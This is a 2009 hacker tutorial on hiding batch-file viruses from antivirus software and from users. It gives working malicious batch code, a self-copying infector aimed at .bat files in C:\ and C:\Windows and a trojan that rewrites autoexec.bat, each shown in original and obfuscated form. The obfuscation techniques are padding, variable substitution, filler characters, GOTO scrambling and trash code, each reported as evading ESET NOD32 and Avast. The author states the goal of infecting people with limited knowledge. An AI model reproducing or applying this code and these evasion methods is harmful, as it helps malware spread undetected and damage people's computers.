cOrRuPt G3n3t!x
July 2009
In order to make our batch file virus a little more inconspicuos, unreadable or undetectable we use batch encryption techniques to fool AV's and people trying read or decypher our code. There are many different ways and today i'll explain all the possible ways i know for batch encryption and AV & AV heuristics fooling. I used ESET NOD32 Anti-Virus for its great herustics capabilities and Avast4 Professional Edition for normal detection. Please remember all techniques have been tested on Windows Vista and work!
AV companies needed a way to test whether their product works on the users computer but without bringing harm to it, so EICAR was born, a universal string of code that will set off all AV's but will display 'EICAR TEST FILE NOT A VIRUS' or something similar, so we therefore, add this string to the begining of our code in hopes that the user will let it run after seeing that its a test file and not a virus. This will help when infecting people with limited knowlegde on viruses so definitely not a great technique when compared to others but non the less, here's the string for the EICAR 'Virus' which should be added to the beginning of your code:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
All AV's will only scan the first 1000 bytes of a batch file for any malicious code, so what do we do? We add a whole bunch of letters in the first 1000 bytes of our code, pretty easy and an excellent way to bypass scanners and in some cases AV heurstics. So here is exactly a 1000 bytes of useless code which should be pasted at the beginning of your code:
jfnvjdfvbdfrjcedjcndskcjlewkjdelkasusywkiqwndsjhcgbdkisknckichcdsjyefgwiednnauxxbjnkaskjgbuhyhdgddr djdchcvnfdhvjknvjknvfbdfhvbdfjncfdnfhvjrhskjfnmaskldnchfvbgfvffscdjfbnjehcfnjhcbjhnvdjuknvchdhbhvhf fdgvcdfgcvjhvbnfvfdhbfvdjnfvdnbjfvnjgbnjkfvsjlsfdjhfsndsajkfdsvefeyufguyshduygfbdbcyufreubfuyhfdbk fndsfungcuhfjhcvnhsfdncjsjzlixldjfouyfhfrufmrnjhggvcnnfvdeyhfyfghnfguhfuyndfhfdrsognfdhjfdyfdhfdhg fhvbdh7rhuigfuhgudjfdujguighsudgduhgjugsifdkgiojfdhiudfgmnjhdgufhuigfjguijgukhgkjgufdhgjfugfchghjh hsbdfjdrbfjdbgvfovngkllksfjbnmgkjvnvjkgfnkbfgvhnfgijgfjknfghjgffghdunvuhnuihgfgjifugjiuhdruiryhgui dsbdyhceyifgbycgnjhfhjhvfbdgjhnhjhsdhbgsftrhgbvsrulsfkewajfreihnrnusrnvcuhiurgfeuygfruyfgybfdbkjkd dscgfbdofnjkfhnkjfnkovmhuihgudljcugrhnuhvgvnuivgfhgdfigjngnklvtghnmgiojgfnkjgfhnfhngfvjnkfgvlkgfng fdkbsdcfhnmvghnfvkjfjkgfpkogjroisjoersmcetkuntbggkhgjhdlewrlkjrhjiurnvuinvynbtrhurenyviuntruirtunv dsuifhuyafgbycfgruyfgnucafipjnfnjkhnfidhfvmdkhzkdlhfnuygjkdngtfrjhnguhyghsduvbgrjkhvsriulkghnkjhgu
As the acronym would suggest this is a technique whereby the 'set' command in MS-DOS is used to encrypt the batch file and make it hard for the AV to analyze and for the user to interpret. we do this by assigning a variable to a set command, this might not make sense but see below:
This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
for %%a in (*.bat) do copy %0 %%a
Now by encrypting vairbles: for, in, do and copy it will become undetected. Although it was not detected by encrypting only one of the variables this will not always be the case. This was not detected by ESET NOD32 or Avast4:
set a=for set b=in set c=do set d=copy %a% %%a %b% (*.bat) %c% %d% %0 %%a
This will be compilcated for others to read but not for people with a knowledge of batch so what you could do is make the set encryption appear at the bottom of your code and then begin to read the top, this will work well with large code as the user will have to scroll down to see the set encryption. You can do this simply by having a 'GOTO' command that will goto the decryption parameter before returning to the encrypted code, using more then one variable will make it much harder to read! See below:
@echo off GOTO decrypt :infect %a% %%a %b% (*.bat) %c% %d% %0 %%a %a% %%a %b% (C:\*.bat) %c% %d% %0 %%a %a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a exit :decrypt set a=for set b=in set c=do set d=copy goto infect
Fisrt off thanks to DvL for this idea and now lets begin. This is just an awesome name i gave to a Anti AV technique that will help by hiding your lines and fool the AV from detecting the right tokens in your batch. All you need to do is add characters betwee each line of your code, it can also be numbers I used the character 'n' as it was used in the legendary SASSER worm to cause a buffer overrun. The only snag is the virus has to have more then 3 or 4 lines to work effectively.
This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32
@echo off ctty nul @echo subst e: a:\ > c:\autoexec.bat @echo subst d: a:\ >> c:\autoexec.bat @echo subst c: a:\ >> c:\autoexec.bat ctty con cls
When using the Character Overflow technique it was not detected by ESET NOD32:
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn @echo off nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn ctty nul nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn @echo subst e: a:\ > c:\autoexec.bat nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn @echo subst d: a:\ >> c:\autoexec.bat nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn @echo subst c: a:\ >> c:\autoexec.bat nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn ctty con nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn cls nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
This is a bit impractical as it takes extremely long and is pretty confusing depending on the size of your code. It only works with code that is longer then 5 lines. What it does is confuse the AV by giving multiple goto commands so the strings of the virus is seperate and not read as a single token so it wont be detected.
This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:
@echo off ctty nul @echo subst e: a:\ > c:\autoexec.bat @echo subst d: a:\ >> c:\autoexec.bat @echo subst c: a:\ >> c:\autoexec.bat ctty con cls
Using the GOTO confuser it was not detected by ESET NOD32:
@echo off goto a :f ctty nul goto b :l @echo subst e: a:\ > c:\autoexec.bat goto c :m @echo subst d: a:\ >> c:\autoexec.bat goto d :r @echo subst c: a:\ >> c:\autoexec.bat ctty con cls :a goto f :b goto l :c goto m :d goto r
This refers to lines of code that simply do nothing, but as far as the AV is concerned its working code so wat do we do with this in mind? We put meaningless garbage between our actual code, it is however important to note that the lines you are using for trash code is not used for anything:
This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
for %%a in (*.bat) do copy %0 %%a
When using garbage or trash code it was not detected:
set trash= %trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a
In the first line we made sure trash was set to nothing then added the code to the virus it worked perfectly without being detected!
Thats all i have for now, i hope it helps, and be sure to look out for my next Tutorial on 'Polymorphism In Batch'. Remember this is for educational purposes only ;). If you'd like to contact me with any queries or problems please e-mail me at immortalassassin@rocketmail.com.